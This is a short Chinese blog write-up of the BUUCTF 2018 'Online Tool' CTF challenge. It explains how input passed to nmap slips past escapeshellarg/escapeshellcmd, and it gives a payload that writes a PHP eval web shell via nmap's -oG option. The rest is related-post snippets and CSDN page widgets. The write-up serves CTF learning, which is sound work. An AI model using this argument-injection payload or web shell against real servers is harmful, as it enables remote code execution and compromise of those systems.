[BUUCTF 2018]Online Tool

于 2024-01-28 11:49:53 发布
阅读量220 收藏
点赞数 1
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78136321/article/details/135893208
版权

1.打开题目首先看到一篇代码

emmm,可以知道是需要用get传入host=IP,然后用nmap的方式进行扫描

2.这道题给我的感觉和前几天做的一道题比较像,都是用的是escapeshellarg和escapeshellcmd函数,这个函数按照我自己的理解来说就是会对上传的字符进行转义,转译为可供cmd执行的命令,构建payload:

' <?= @eval($_POST["mandrill"]);?> -oG manrill.php '

成功拿到flag

blackmandrill
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF 2018 Online Tool
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
[BUUCTF2018 Online Tool]
uuzfumo的博客
11-01 264
新手RCE题目
[BUUCTF 2018]Online Tool -wp
freerats的博客
07-03 336
打开网页可以看到代码,进行代码审计 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); 获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录 尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描 $host = $_GET['host']; $ho.
Seal Online Tool_tool_ToolsItem.scr_
10-02
《Seal Online Tool_tool_ToolsItem.scr》是一款专门针对网络游戏《封印传说》(Seal Online)的离线编辑工具。它主要用于编辑游戏中的物品脚本( SCR 文件),允许玩家在不连接到游戏服务器的情况下对游戏内的道具...
sqlTool.rar_Online SQL Tool_SQLTool_sqlto
09-24
标题中的"sqlTool.rar_Online SQL Tool_SQLTool_sqlto"提到了一个名为"SQLTool"的在线SQL处理工具。这个工具允许用户通过网络界面执行SQL语句,进行数据库的查询、更新、插入和删除等操作,无需在本地安装任何特定的...
Online-Compile
01-30
Online_Compile
online_classroom.csv
03-17
CSDN因果分析系列相关数据
qt-unified-windows-x86-online.exe
07-14
"qt-unified-windows-x86-online.exe" 是一个用于Windows 32位系统的QT在线安装程序,它提供了方便的方式来下载和安装QT开发环境。 这个安装程序的核心功能包括: 1. **集成安装器**:qt-unified-windows-x86-on...
青岛大学开源 Online Judge
11-03
青岛大学开源 Online Judge | QQ群 496710125 。。。。。
Audio Recorder Online-0.1.zip
最新发布
12-27
名称:Audio Recorder Online -------------------- 版本:0.1 作者:Curt Norval 分类:其他 -------------------- 概述:“Audio Recorder Online”是一个允许您使用计算机麦克风录制音频的程序。 描述: “...
online Bagging and Boosting
03-26
Bagging and boosting are well-known ensemble learning methods. we present simple online bagging and boosting algorithms that we claim perform as well as their batch counterparts.
ActionScriptforMultiplayerGamesandVirtualWorlds.ra_flash online
09-22
主要是用与flash的游戏开发,也就是多人在线游戏的制作
Ace Online GM Tool_tool_aceonline_gmtool网页版_AceOnlineGMTool_源码
10-02
Ace Online GM Tool 是一款专为 ACE Online(壮志凌云)这款游戏设计的游戏管理工具,它提供了网页版的界面,使得游戏管理员(GM)能够更方便地进行游戏维护、管理以及玩家支持工作。这款工具通常由游戏开发团队或者...
管家婆ONLINE 127用户版补丁
12-15
【管家婆ONLINE 127用户版补丁】是一款专为管家婆ONLINE系统设计的更新程序,主要目的是为了优化和完善原有软件的功能,提升系统的稳定性和安全性,以适应127个用户同时在线操作的需求。这个补丁的发布,体现了软件...
DeltaV book online
06-27
艾默生DCS控制系统-Deltav全套的中文手册。对于想要深入了解DeltaV系统的人员有很大帮助。
ArcGIS Online介绍
10-10
介绍了ArcGIS Online的体系结构及利用ArcGIS Online实现企业GIS应用
对接SuperMap Online的公有服务
12-08
在IT行业中,SuperMap Online是一个强大的云计算平台,它提供了丰富的地图服务、空间分析工具以及GIS应用开发接口。本文将深入探讨如何在移动端对接SuperMap Online的公有服务,实现多种功能,包括坐标点转换、地理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值